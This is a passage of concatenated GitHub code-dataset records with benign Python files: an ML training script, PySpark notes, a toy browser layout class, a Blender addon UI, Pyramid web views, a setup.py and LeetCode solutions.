default=3)\nparser.add_argument(\"--prior_classifier_class_num_per_head\", type=str, default=json.dumps([2,2,4]))\nparser.add_argument(\"--prior_classifier_mid_size\", type=int, default=128)\n\nargs = parser.parse_args()\n\nif not args.not_prior:\n args.prior = True\nelse:\n args.prior = False\n\nif args.wandb:\n wandb.login()\n wandb.init(project=\"\", entity=\"\")#your account\n\n\n\n\nadv_z_prob_args = None\nprior_classify_args = None\n\nloss_list = {}\nif args.adv_z_prob_loss is not None:\n loss_list['adv_z_prob_loss'] = args.adv_z_prob_loss\n adv_z_prob_args = {\n \"grouping\": json.loads(args.adv_z_prob_grouping)\n }\n\nif args.adv_x_prob_loss is not None:\n 
loss_list['adv_x_prob_loss'] = args.adv_x_prob_loss\n\nif args.prior_classify_loss is not None:\n loss_list['prior_classify_loss'] = args.prior_classify_loss\n prior_classify_args = {\n 'head_num':args.prior_classifier_head_num, \n 'class_num_per_head':json.loads(args.prior_classifier_class_num_per_head),\n 'mid_size':args.prior_classifier_mid_size\n }\n\n\n\n\nencoder_tokenizer = BertTokenizer.from_pretrained(args.pretrained_encoder)\nencoder = BertModel.from_pretrained(args.pretrained_encoder)\ndecoder_tokenizer = GPT2Tokenizer.from_pretrained(args.pretrained_decoder)\ndecoder = GPT2LMHeadModel.from_pretrained(args.pretrained_decoder)\ndecoder_tokenizer.pad_token = decoder_tokenizer.eos_token\n\n\n\n\nmodel = AE(encoder=encoder, decoder=decoder, args=args)\nmodel.load_state_dict(torch.load(args.model_path), strict=False)\n\n\nmodel.set_losslist(loss_list, adv_z_prob_args=adv_z_prob_args, prior_classify_args=prior_classify_args)\n\n\nif not args.no_fix:\n model.fix_decoder()\n\nmodel.set_mode('prior')\n\n\ndataset = [{'sent':[]} for i in range(8)]\n\nwith open('../data/IMDb/IMDb.txt', 'r') as f:\n for line in f.readlines():\n line = json.loads(line)\n label = int(line[0])\n dataset[0+label]['sent'].append(line[1].strip())\n #dataset[0]['type'].append(int(line[0]))\n\nwith open('../data/AGnews/AG-data.txt', 'r') as f:\n for line in f.readlines():\n line = json.loads(line)\n label = int(line[0])\n dataset[2+label]['sent'].append(line[1].strip())\n #dataset[1]['type'].append(int(line[0]))\n\nwith open('../data/ToxicComment/Toxic.txt', 'r') as f:\n for line in f.readlines():\n line = json.loads(line)\n label = int(line[0])\n dataset[6+label]['sent'].append(line[1].strip())\n #dataset[2]['type'].append(int(line[0]))\n\n\n\ncolumns = ['encoder_input_ids', 'encoder_attention_mask', 'encoder_token_type_ids']\nadv_columns = ['adv_input_ids', 'adv_attention_mask', 'adv_token_type_ids']\n\nif args.adv_x_prob_loss is not None:\n train_dataset = {i:[] for i in (columns + adv_columns)}\nelse:\n train_dataset = {i:[] for i in columns}\n\nif args.prior_classify_loss is not None:\n train_dataset['head_index'] = []\n train_dataset['pos_label'] = []\ntrain_dataset['prior_head_index']=[]\n\n#for i in range(8):\n\nif args.adv_x_prob_loss is not None:\n #####adv_data\n adv_sent = dataset[3]['sent'] + dataset[4]['sent'] + dataset[5]['sent']\n random.shuffle(adv_sent)\n adv_dataset = {'sent':adv_sent}\n\n tmp_dataset = Dataset.from_dict(adv_dataset)\n tmp_dataset = tmp_dataset.map(lambda e: encoder_tokenizer(e['sent'], max_length=args.max_length, padding='max_length', truncation=True), batched=True)\n tmp_dataset = tmp_dataset.rename_columns({'input_ids':'adv_input_ids', 'attention_mask':'adv_attention_mask', 'token_type_ids':'adv_token_type_ids'})\n tmp_dataset.set_format(type='torch', columns=['adv_input_ids', 'adv_token_type_ids', 'adv_attention_mask'])\n adv_dataloader = torch.utils.data.DataLoader(tmp_dataset, batch_size=(args.batch_size * 3))\n \n\nif args.prior_classify_loss is not None:\n label_dict=[[0,0],[0,1],[2,0],[2,1],[2,2],[2,3],[1,0],[1,1]]\n\n\n#for i in [2,3,4,5]:\nfor i in range(8):\n tmp_dataset = Dataset.from_dict(dataset[i])\n tmp_dataset = tmp_dataset.map(lambda e: encoder_tokenizer(e['sent'], max_length=args.max_length, padding='max_length', truncation=True), batched=True)\n tmp_dataset = tmp_dataset.rename_columns({'input_ids':'encoder_input_ids', 'attention_mask':'encoder_attention_mask', 'token_type_ids':'encoder_token_type_ids'})\n tmp_dataset.set_format(type='torch', 
columns=['encoder_input_ids', 'encoder_token_type_ids', 'encoder_attention_mask'])\n tmp_dataloader = torch.utils.data.DataLoader(tmp_dataset, batch_size=args.batch_size)\n for cnt in iter(tmp_dataloader):\n for k in columns:\n train_dataset[k].append(cnt[k].tolist())\n train_dataset['prior_head_index'].append(i)\n if args.prior_classify_loss is not None:\n train_dataset['head_index'].append(label_dict[i][0])\n train_dataset['pos_label'].append([label_dict[i][1]]*args.batch_size)\n \n if args.adv_x_prob_loss is not None:\n for adv_cnt in iter(adv_dataloader):\n for k in adv_columns:\n train_dataset[k].append(adv_cnt[k].tolist())\n\n \n\n\ntrain_dataset = Dataset.from_dict(train_dataset)\n\nult_columns = columns + ['prior_head_index']\nif args.adv_x_prob_loss is not None:\n ult_columns = ult_columns + adv_columns\n #train_dataset.set_format(columns=columns+adv_columns+['prior_head_index'])\nif args.prior_classify_loss is not None:\n ult_columns = ult_columns + ['head_index', 'pos_label']\n #train_dataset.set_format(columns=columns+['prior_head_index'])\n\ntrain_dataset.set_format(columns=ult_columns)\n\n\n\n\n\n\ntraining_args = TrainingArguments(\n output_dir=args.model_dir,\n learning_rate=args.lr,\n num_train_epochs=args.epoch,\n #gradient_accumulation_steps=4,\n per_device_train_batch_size=1,\n logging_dir='./logs',\n logging_steps=100,\n do_train=True,\n do_eval=False,\n no_cuda=args.no_cuda,\n save_strategy=\"steps\",\n save_steps=5000,\n fp16=args.fp16,\n report_to='wandb' if args.wandb else 'none'\n)\ntrainer = Trainer(\n model=model,\n args=training_args,\n train_dataset=train_dataset\n)\ntrain_out = trainer.train()\n","repo_name":"HappyGu0524/MultiControl","sub_path":"priorcontrol/train_prior_only.py","file_name":"train_prior_only.py","file_ext":"py","file_size_in_byte":8046,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"7"} +{"seq_id":"13272811619","text":"# JOIN DATA FRAMES\n\n# [LEFT].join([RIGHT], on=[PREDICATE] how=[METHOD])\n\n# Joining the DataFrames on 'affinity-id'\n# from pyspark.sql.functions import col\n# joined_df = (\n# br__series_contract.underwriting_spendings\n# .join(\n# br__contract.jumanji_runs,\n# col('br__series_contract.underwriting_spendings.affinity-id') == col('br__contract.jumanji_runs.affinity-id'),\n# 'inner'\n# )\n# )\n\nimport pyspark.sql.functions as F \n\napplied_hardcuts = (\n spark.table(\"table_a\")\n .where(F.col(\"hardcut_applied\") == True)\n .where(F.col(\"product\") == \"credit-card\")\n .where(F.col(\"hardcut_checked_at\") > \"2023-04-01\")\n .alias(\"hardcuts\"))\n\nblocked_tax_id_runs = (\n spark.table(\"table_b\")\n .where(F.col(\"run__affinity_type\") == \"xxx\")\n .withColumnRenamed(\"run__affinity_id\", \"affinity_id\")\n .drop(F.col(\"run__finished_at\"))\n .alias(\"runs\")\n .join(bv_cadastral_applied_hardcuts, F.col(\"hardcuts.underwriting__id\") == F.col(\"runs.affinity_id\"))\n .show(10))\n \n# IF we need to filter more than one column, we could use this:\n# .join(bv_cadastral_applied_hardcuts, (F.col(\"hardcuts.underwriting__id\") == F.col(\"runs.affinity_id\")) \n# & (F.col(\"hardcuts.tax_id\") == F.col(\"runs.tax_id\")))\n \n\n","repo_name":"pitz/pyspark-notes","sub_path":"notebooks/join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"44766546138","text":"import tkinter\nimport tkinter.font\nfrom browser.Text import Text\nfrom browser.DrawText import 
DrawText\nfrom browser.DrawRect import DrawRect\nfrom browser.Element import Element\nfrom browser.TextLayout import TextLayout\nfrom browser.LineLayout import LineLayout\n\nWIDTH, HEIGHT = 800, 600\nSCROLL_STEP = 100\nHSTEP, VSTEP = 13, 18\n\n\nclass InlineLayout:\n\n def __init__(self, node, parent, previous):\n self.FONTS = {}\n self.weight = \"normal\"\n self.style = \"roman\"\n self.size = 16\n self.node = node\n self.parent = parent\n self.previous = previous\n self.children = []\n\n def paint(self, display_list):\n bgcolor = self.node.style.get(\"background-color\",\n \"transparent\")\n if bgcolor != \"transparent\":\n x2, y2 = self.x + self.width, self.y + self.height\n rect = DrawRect(self.x, self.y, x2, y2, bgcolor)\n display_list.append(rect)\n\n for child in self.children:\n child.paint(display_list)\n\n def layout(self):\n self.width = self.parent.width\n self.x = self.parent.x\n if self.previous:\n self.y = self.previous.y + self.previous.height\n else:\n self.y = self.parent.y\n\n self.new_line()\n self.recurse(self.node)\n for line in self.children:\n line.layout()\n \n self.height = sum([line.height for line in self.children])\n # self.height = self.cursor_y - self.y\n\n def open_tag(self, tag):\n if tag == \"i\":\n self.style = \"italic\"\n elif tag == \"b\":\n self.weight = \"bold\"\n elif tag == \"small\":\n self.size -= 2\n elif tag == \"big\":\n self.size += 4\n elif tag == \"br\":\n self.flush()\n\n def close_tag(self, tag):\n if tag == \"/i\":\n self.style = \"roman\"\n elif tag == \"/b\":\n self.weight = \"normal\"\n elif tag == \"/small\":\n self.size += 2\n elif tag == \"/big\":\n self.size -= 4\n elif tag == \"/p\":\n self.flush()\n self.cursor_y += VSTEP\n\n # def token(self, tok):\n # if isinstance(tok, Text):\n # self.text(tok)\n # elif tok.tag == \"i\":\n # self.style = \"italic\"\n # elif tok.tag == \"/i\":\n # self.style = \"roman\"\n # elif tok.tag == \"b\":\n # self.weight = \"bold\"\n # elif tok.tag == \"/b\":\n # self.weight = \"normal\"\n # elif tok.tag == \"small\":\n # self.size -= 2\n # elif tok.tag == \"/small\":\n # self.size += 2\n # elif tok.tag == \"big\":\n # self.size += 4\n # elif tok.tag == \"/big\":\n # self.size -= 4\n # elif tok.tag == \"br\":\n # self.flush()\n # elif tok.tag == \"/p\":\n # self.flush()\n # self.cursor_y += VSTEP\n\n\n def text(self, node):\n color = self.node.style[\"color\"]\n weight = self.node.style[\"font-weight\"]\n style = self.node.style[\"font-style\"]\n if style == \"normal\":\n style = \"roman\"\n size = int(float(self.node.style[\"font-size\"][:-2]) * .75)\n font = self.get_font(size, weight, style)\n for word in node.text.split():\n w = font.measure(word)\n if self.cursor_x + w > self.width - HSTEP:\n self.new_line()\n # self.cursor_y += font.metrics(\"linespace\") * 1.25\n cursor_x = HSTEP\n line = self.children[-1]\n text = TextLayout(node, word, line, self.previous_word)\n line.children.append(text)\n self.previous_word = text\n self.cursor_x += w + font.measure(\" \")\n\n def new_line(self):\n self.previous_word = None\n self.cursor_x = self.x\n last_line = self.children[-1] if self.children else None\n new_line = LineLayout(self.node, self, last_line)\n self.children.append(new_line)\n\n def flush(self):\n if not self.line: return\n metrics = [font.metrics() for x, word, font, color in self.line]\n max_ascent = max([metric[\"ascent\"] for metric in metrics])\n baseline = self.cursor_y + 1.25 * max_ascent\n for x, word, font, color in self.line:\n y = baseline - font.metrics(\"ascent\")\n 
self.display_list.append((x, y, word, font, color))\n self.cursor_x = self.x\n self.line = []\n max_descent = max([metric[\"descent\"] for metric in metrics])\n self.cursor_y = baseline + 1.25 * max_descent\n\n def get_font(self, size, weight, slant):\n key = (size, weight, slant)\n if key not in self.FONTS:\n font = tkinter.font.Font(size=self.size, weight=weight, slant=slant)\n self.FONTS[key] = font\n return self.FONTS[key]\n\n def recurse(self, node):\n if isinstance(node, Text):\n self.text(node)\n else:\n if node.tag == \"br\":\n self.flush()\n for child in node.children:\n self.recurse(child)\n\n def __repr__(self) -> str:\n return f\"InlineLayout(y={self.y}, height={self.height})\"\n\n","repo_name":"acz995/pythonProject","sub_path":"browser/InlineLayout.py","file_name":"InlineLayout.py","file_ext":"py","file_size_in_byte":5215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7625471345","text":"from setuptools import setup\r\n\r\nwith open(\"README.md\", \"r\") as fh:\r\n long_description = fh.read()\r\n\r\nsetup(\r\n name = 'pySerialTransfer',\r\n packages = ['pySerialTransfer'],\r\n version = '2.1.7',\r\n description = 'Python package used to transmit and receive low overhead byte packets - especially useful for PC<-->Arduino USB communication (compatible with https://github.com/PowerBroker2/SerialTransfer)',\r\n long_description = long_description,\r\n long_description_content_type = \"text/markdown\",\r\n author = 'Power_Broker',\r\n author_email = 'gitstuff2@gmail.com',\r\n url = 'https://github.com/PowerBroker2/pySerialTransfer',\r\n download_url = 'https://github.com/PowerBroker2/pySerialTransfer/archive/2.1.7.tar.gz',\r\n keywords = ['Arduino', 'serial', 'usb', 'protocol', 'communication'],\r\n classifiers = [],\r\n install_requires = ['pyserial']\r\n)\r\n","repo_name":"PowerBroker2/pySerialTransfer","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"7"} +{"seq_id":"45492929379","text":"class Solution(object):\n def countSubstrings(self, s):\n # aaaabaabaa 单数中心:b, aba, aabaa; 偶数中心:aa, aaaa\n # 1.定义一个spread函数,扩散次数=回文子串个数\n def spread(s, left, right):\n # count为扩散次数,没扩散一次增加一个新的回文子串\n count = 0\n # 循环遍历字符串s,如果char[left] = char[right]则 count+1\n while left >= 0 and right < len(s) and s[left] == s[right]:\n left -= 1\n right += 1\n count += 1\n return count\n # 2.按回文类型分类讨论\n result = 0\n # 循环遍历字符串s的角标\n for i in range(len(s)):\n result += spread(s, i, i) # 单数中心\n for i in range(len(s)- 1):\n result += spread(s, i, i + 1) #偶数中心\n return result\n\n","repo_name":"YujieFan/leetcode","sub_path":"647.py","file_name":"647.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6151052612","text":"if \"bpy\" in locals():\n import importlib\n for mod in [\n gen_functions,\n imp_functions,\n sys_functions,\n operators,\n settings\n ]:\n importlib.reload(mod)\nelse:\n import bpy\n from . 
import (\n gen_functions,\n imp_functions,\n sys_functions,\n operators,\n settings\n )\n\n\nclass AlphaTreesPrefs(bpy.types.AddonPreferences):\n bl_idname = __package__\n\n show_extra_operators: bpy.props.BoolProperty(\n name=\"Show extra operators\",\n default = True,\n )\n\n def draw(self, context):\n layout = self.layout\n layout.prop(self, \"show_extra_operators\")\n\n# class PreviewMenu(bpy.types.Menu):\n# bl_idname = \"ALPHATREE_MT_preview_options\"\n# bl_label = \"Previews\"\n\n# def draw(self, context):\n# layout = self.layout\n\n# layout.operator(operators.ALPHATREE_OT_multi_import.bl_idname, text=\"Multi import\", icon = \"DOCUMENTS\")\n\nclass ALPHATREE_UL_SystemList(bpy.types.UIList):\n \"\"\"UIlist for the particle systems\"\"\"\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n custom_icon = 'PARTICLES'\n\n if self.layout_type in {'DEFAULT', 'COMPACT'}:\n row = layout.row(align = True)\n row.prop(item, \"name\", text=\"\", emboss=False, icon=custom_icon)\n\n if item.show_viewport:\n row.prop(item, \"show_viewport\", text=\"\", emboss=False, icon=\"RESTRICT_VIEW_OFF\")\n else:\n row.prop(item, \"show_viewport\", text=\"\", emboss=False, icon=\"RESTRICT_VIEW_ON\")\n\n if item.show_render:\n row.prop(item, \"show_render\", text=\"\", emboss=False, icon=\"RESTRICT_RENDER_OFF\")\n else:\n row.prop(item, \"show_render\", text=\"\", emboss=False, icon=\"RESTRICT_RENDER_ON\")\n\n elif self.layout_type in {'GRID'}:\n layout.alignment = 'CENTER'\n layout.prop(item, \"name\", text=\"\", emboss=False, icon=custom_icon)\n\nclass ALPHATREE_PT_import_panel(bpy.types.Panel):\n \"\"\"Import panel\"\"\"\n bl_space_type = \"VIEW_3D\"\n bl_context = \"objectmode\"\n bl_region_type = \"UI\"\n bl_label = \"Alpa trees importer\"\n bl_category = \"Alpha Trees\"\n\n def draw(self, context):\n layout = self.layout\n at = bpy.context.scene.alpha_trees\n\n row = layout.row(align=True)\n row.prop(at,\"import_type\",expand = True,)\n\n if at.import_type == \"PARTICLE\":\n\n if context.object:\n sys_list, sys_settings, index, psystems, item = sys_functions.get_system_vars(self,context)\n\n row = layout.row(align = True)\n row.template_list(\"ALPHATREE_UL_SystemList\", \"The_List\", context.object, \"sys_list\", context.object.sys_settings, \"index\")\n column = row.column()\n col = column.column(align=True)\n actions_name = operators.ALPHATREE_OT_sys_list_actions.bl_idname\n col.operator(actions_name, text=\"\", icon=\"ADD\").action = \"ADD\"\n row = col.row(align = True)\n if not sys_list:\n row.enabled = False\n row.operator(actions_name, text=\"\", icon=\"REMOVE\").action = \"REMOVE\"\n\n if sys_list:\n if len(sys_list) >= 2:\n col = column.column(align=True)\n col.operator(actions_name, text=\"\", icon=\"TRIA_UP\").action = \"UP\"\n col.operator(actions_name, text=\"\", icon=\"TRIA_DOWN\").action = \"DOWN\"\n\n #settings row\n row = layout.row()\n row.label(text=item.sys_name)\n\n row = layout.row(align=True)\n if item.particle_settings == \"NONE\":\n row.prop(item, \"particle_settings\", text=\"\", icon=\"SETTINGS\", icon_only=True)\n row.operator(operators.ALPHATREE_OT_new_settings.bl_idname, text=\"New settings\", icon=\"ADD\")\n return\n\n row.prop(item, \"particle_settings\", text=\"\", icon=\"SETTINGS\")\n row.operator(operators.ALPHATREE_OT_new_settings.bl_idname, text=\"\", icon=\"ADD\")\n row.operator(operators.ALPHATREE_OT_remove_settings.bl_idname, text=\"\", icon=\"REMOVE\")\n\n box = layout.box()\n boxcol = box.column(align=True)\n 
boxcol.template_icon_view(item, \"selected_tree\", scale=6, scale_popup=7, show_labels=True)\n\n col = layout.column(align = True)\n boxcol = col.box().column()\n row = boxcol.row()\n\n #particle settings\n if at.show_particle_settings:\n row.prop(at, \"show_particle_settings\", text = \"\", icon = \"TRIA_DOWN\")\n row.label(text=\"Settings\")\n\n psettings = bpy.data.particles[item.particle_settings]\n psys = psystems[psystems.find(item.sys_name)]\n\n boxcol = col.box().column()\n boxcol.use_property_split = True\n boxcol.prop(psys, \"seed\")\n boxcol.prop(psettings, \"count\")\n boxcol.prop(psettings, \"particle_size\", text=\"Size\")\n boxcol.prop(psettings, \"size_random\")\n boxcol.prop(item, \"random_rotation\", slider=True)\n boxcol.prop(psettings, \"display_percentage\", text=\"Viewport\")\n else:\n row.prop(at, \"show_particle_settings\", text = \"\", icon = \"TRIA_RIGHT\")\n row.label(text=\"Settings\")\n\n #materials\n if item.selected_tree != \"default.png\":\n\n col = layout.column(align = True)\n boxcol = col.box().column()\n row = boxcol.row()\n\n if at.show_material_settings:\n row.prop(at, \"show_material_settings\", text = \"\", icon = \"TRIA_DOWN\")\n row.label(text=\"Material\")\n boxcol = col.box().column()\n\n object = bpy.data.collections[item.particle_settings].objects[item.particle_settings.replace(\"AT_PSYSTEM_\",\"\")]\n control_node = object.material_slots[0].material.node_tree.nodes[\"Alpha trees control\"]\n imp_functions.draw_material_settings(context, boxcol, control_node)\n else:\n row.prop(at, \"show_material_settings\", text = \"\", icon = \"TRIA_RIGHT\")\n row.label(text=\"Material\")\n\n else:\n\n imp_functions.draw_preview_enum(\n self,\n context,\n layout,\n [operators.ALPHATREE_OT_change_tree, operators.ALPHATREE_OT_reload_previews, operators.ALPHATREE_OT_multi_import],\n at,\n \"alpha_trees_previews\"\n )\n\n #row = layout.row()\n #row.alignment = \"CENTER\"\n #row.label(text = at.alpha_trees_previews[:-19])\n\n row = layout.row()\n row.scale_y = 1.8\n row.operator(\"alpha_tree.import_tree\", icon=\"VOLUME_DATA\", text = \"Import: \" + at.alpha_trees_previews[:-19])\n\n\nclass ALPHATREE_PT_overall_settings(bpy.types.Panel):\n \"\"\"Overall settings panel\"\"\"\n bl_space_type = \"VIEW_3D\"\n bl_context = \"objectmode\"\n bl_region_type = \"UI\"\n bl_label = \"Overall settings\"\n bl_category = \"Alpha Trees\"\n bl_parent_id = \"ALPHATREE_PT_import_panel\"\n bl_options = {\"DEFAULT_CLOSED\"}\n\n @classmethod\n def poll(cls, context):\n at = context.scene.alpha_trees\n return at.import_type == \"PARTICLE\"\n\n def draw(self, context):\n layout = self.layout\n at = context.scene.alpha_trees\n\n col = layout.column(align=True)\n col.use_property_split = True\n col.prop(at,\"particle_rotation\")\n\nclass ALPHATREE_PT_material_settings(bpy.types.Panel):\n \"\"\"Material settings panel\"\"\"\n bl_space_type = \"VIEW_3D\"\n bl_context = \"objectmode\"\n bl_region_type = \"UI\"\n bl_label = \"Material settings\"\n bl_category = \"Alpha Trees\"\n bl_parent_id = \"ALPHATREE_PT_import_panel\"\n bl_options = {\"DEFAULT_CLOSED\"}\n\n @classmethod\n def poll(cls, context):\n object = context.object\n\n if context.scene.alpha_trees.import_type == \"PARTICLE\":\n return False\n\n if not object:\n return False\n\n elif not object.material_slots:\n return False\n\n elif not object.material_slots[0].material:\n return False\n\n elif not object.material_slots[0].material.use_nodes:\n return False\n\n elif not object.material_slots[0].material.node_tree.nodes:\n return 
False\n\n try:\n _ = object.material_slots[0].material.node_tree.nodes[\"Alpha trees control\"]\n except KeyError:\n return False\n\n return True\n\n def draw(self, context):\n layout = self.layout\n object = context.active_object\n control_node = object.material_slots[0].material.node_tree.nodes[\"Alpha trees control\"]\n\n col = layout.column(align = True)\n imp_functions.draw_material_settings(context,col, control_node)\n\n\nclass ALPHATREE_PT_gen_panel(bpy.types.Panel):\n \"\"\"Generator panel\"\"\"\n bl_space_type = \"VIEW_3D\"\n bl_context = \"objectmode\"\n bl_region_type = \"UI\"\n bl_label = \"Alpa trees generator\"\n bl_category = \"Alpha Trees\"\n bl_options = {\"DEFAULT_CLOSED\"}\n\n def draw(self, context):\n prefs = context.preferences.addons[__package__].preferences\n at = bpy.context.scene.alpha_trees\n layout = self.layout\n if prefs.show_extra_operators:\n gen_functions.dropdown_operator(\n layout,\n context,\n name=\" Alpha Trees\",\n operators=[\"alpha_tree.set_up_tree\",\"alpha_tree.render_maps\", \"alpha_tree.open_folder\", ],\n icons=[\"SORT_DESC\",\"RESTRICT_RENDER_OFF\", \"FILEBROWSER\", ],\n operator_booleans=[at.show_setup_tree_settings,at.show_render_settings, at.show_open_folder_settings, ],\n operator_boolean_strings=[\"show_setup_tree_settings\", \"show_render_settings\", \"show_open_folder_settings\", ],\n operator_settings=[[\"border_padding\"], [\n \"resolution\", \"render_filepath\", \"diff_render\", \"nor_render\", \"mask_render\", \"overwrite\", \"remove_extra_masks\", ], [\"open_leaf_folder\"]],\n setttings_toggle=[[], [False, False,True, True, True, False, False], []]\n )\n\n # else:\n # row = layout.row()\n # row.alignment = \"RIGHT\"\n # row.prop(at, \"show_info\", text=\"\", icon=\"INFO\", emboss=False)\n # col = layout.column()\n # col.scale_y = 0.8\n # if at.show_info:\n # functions.draw_info(col)\n\n gen_functions.operator_settings(\n layout,\n context,\n bool=at.show_exec_all_settings,\n bool_string=\"show_exec_all_settings\",\n operator=\"alpha_tree.execute_all\",\n settings=[[\"Render border\"], \"border_padding\", [\"Rendering\"],\n \"resolution\", \"render_filepath\", \"diff_render\", \"nor_render\", \"mask_render\", \"overwrite\", \"remove_extra_masks\",[\"Open renders folder\"], \"open_renders_folder\"],\n settings_toggle = [False,False,False,False,False,True,True,True,False,False,False,False,],\n icon=\"DRIVER\",\n scale=1.75)\n\nclasses = [\n ALPHATREE_PT_import_panel,\n ALPHATREE_PT_gen_panel,\n ALPHATREE_PT_material_settings,\n ALPHATREE_PT_overall_settings,\n ALPHATREE_UL_SystemList,\n AlphaTreesPrefs,\n #PreviewMenu,\n]\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n\n\ndef unregister():\n for cls in classes:\n bpy.utils.unregister_class(cls)\n","repo_name":"muhuk/cardmate","sub_path":"cardmate/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":12144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26980919655","text":"import sys\nfrom io import StringIO\nfrom lxml.html import HtmlElement\nimport lxml.html as lh\n#import lxml.html.clean as lhclean\nsys.path.append(\"..\")\n\nfrom DeceptionFeatureExtractor import DeceptionFeatureExtractor as dfe\n\nclass InitialFeatureExtractor(dfe): #HTML and Deception\n def __init__(self, documentName=\"currentWebsite\", indicators=[]):\n dfe.__init__(self, documentName, indicators)\n\n def numOfTagsInString(self, textString):\n maxTagCount = 100 #Unsure of how many HTML tags exist, so not perfect\n 
return float(len(self.htmlParser.getTagsFromString(textString)))/maxTagCount\n\n def _getHREFAndURLTextPairsInString(self, textString):\n tree = lh.fromstring(textString)\n \n if isinstance(tree, HtmlElement):\n return [(tree.get(\"href\"), tree.text)]\n \n urls = tree.xpath(\"//a/@href\")\n textStrings = tree.xpath(\"//a/@href/text()\")\n \n return zip(urls, textStrings)\n\n def proportionOfNonMatchingHRefPairs(self, textString):\n pairs = self._getHREFAndURLTextPairsInString(textString)\n if len(pairs) == 1 and (pairs[0][0] == None\\\n and pairs[0][1] == None): #List/tuple is empty\n return 0\n return float(sum([0 if pair[0] == pair[1] else 1\\\n for pair in pairs]))/len(pairs)\n\n \n \n \n\n","repo_name":"tomer-senexx/fyp","sub_path":"set/code/Python/MainProgram/Extractors/InitialFeatureExtractor.py","file_name":"InitialFeatureExtractor.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32951689392","text":"import os\nfrom typing import List, Optional\n\nimport yarl\n\nPROFILING_VIEW = \"👤 Profiling\"\nOPTIMIZATION_VIEW = \"📈 Optimization\"\nSCORING_VIEW = \"💯 Scoring\"\n\n\ndef build_dashboard_link(\n dataset_uri: str, view: str, instances: Optional[List[str]] = None\n) -> str:\n \"\"\"Dashboard link with filters for a specif dataset and target instances.\"\"\"\n base_url = yarl.URL(os.environ.get(\"DASHBOARD_URL\", \"http://localhost:8501\"))\n query_url = (\n base_url\n % {\"dataset_uri\": dataset_uri, \"view\": view}\n % ({\"instances\": instances} if instances else {})\n )\n return str(query_url)\n","repo_name":"rafaelleinio/thoth","sub_path":"thoth/util/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"} +{"seq_id":"24875370727","text":"from pyramid.exceptions import NotFound\nfrom pyramid.renderers import get_renderer\nfrom pyramid.view import view_config\n\nfrom aamm import Manager\nimport config\n\nclass AAMMViews(object):\n def __init__(self, request):\n self.request = request\n renderer = get_renderer(\"templates/layout.pt\")\n self.layout = renderer.implementation().macros['layout']\n self.aamm = Manager(config.server, config.port,\n config.username, config.password, config.tz_offset)\n\n @view_config(route_name='home', renderer='templates/index.pt')\n def home(self):\n return dict(title='Protected Machines')\n\n @view_config(route_name='machine_view', renderer='templates/machine_view.pt')\n def machine_view(self):\n machine = self.request.matchdict['machine']\n machine_name = self.request.matchdict['machine_name']\n try:\n return dict(title=machine_name, machine=machine)\n except KeyError:\n raise NotFound\n\n @view_config(route_name='mount_do', renderer='templates/mount_do.pt')\n def mount_do(self):\n machine_id = self.request.matchdict['machine']\n machine_name = self.request.matchdict['machine_name']\n recovery_point_id = self.request.matchdict['point_id']\n volume_ids = self.request.matchdict['volume_ids'].split(' ')\n try:\n point = self.aamm.mount_recovery_point(recovery_point_id,\n machine_id,\n machine_name,\n volume_ids)\n\n if point and 'is already being used' in point:\n return dict(title=machine_name, machine=machine_id, task_id=None,\n error='Error: this path is already mounted.')\n elif 'serverError' in point:\n return dict(title=machine_name, machine=machine_id, task_id=None,\n error=point)\n return dict(title=machine_name, 
task_id=str(point),\n machine=machine_id, error=None)\n except KeyError:\n raise NotFound\n\n @view_config(route_name='dismount_do', renderer='templates/dismount_do.pt')\n def dismount_do(self):\n machine_id = self.request.matchdict['machine']\n machine_name = self.request.matchdict['machine_name']\n try:\n point = self.aamm.dismount_recovery_points(machine_id)\n return dict(title=machine_name, recovery_point=point)\n except KeyError:\n raise NotFound\n\n # API\n\n @view_config(route_name='api', renderer='prettyjson')\n def api(self):\n try:\n return self.aamm.get_machines(self.request)\n except KeyError:\n raise NotFound\n\n @view_config(route_name='machine_api', renderer='prettyjson')\n def machine_api(self):\n machine = self.request.matchdict['machine']\n try:\n _, recovery_points = self.aamm.get_recovery_points(machine,\n self.request)\n return recovery_points\n except KeyError:\n raise NotFound\n\n @view_config(route_name='task_api', renderer='prettyjson')\n def task_api(self):\n task_id = self.request.matchdict['task_id']\n return self.aamm.get_progress(task_id)\n\ndef notfound(request):\n request.response.status = 404\n return dict(title='No Such Machine')\n","repo_name":"rshipp/appassure-mount-manager","sub_path":"aamm/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"38317214649","text":"class Solution:\n def isSubsequence(self, s: str, t: str) -> bool:\n if(len(t) == 0): \n return False if(len(s) != 0) else True\n l = 0 \n r = 0\n while l < len(s) and r < len(t):\n if s[l] == t[r]:\n l += 1 \n r += 1\n if l < len(s) and s[l] == t[r-1]:\n l += 1 \n if(l == len(s)):\n return True\n return False","repo_name":"HarshOza36/LeetCode_Problems","sub_path":"String/P392 - isSubsequence.py","file_name":"P392 - isSubsequence.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"7147574018","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 17 15:13:32 2019\n\n@author: Isaac\n\"\"\"\n\nfrom Functions.yes_no_check import 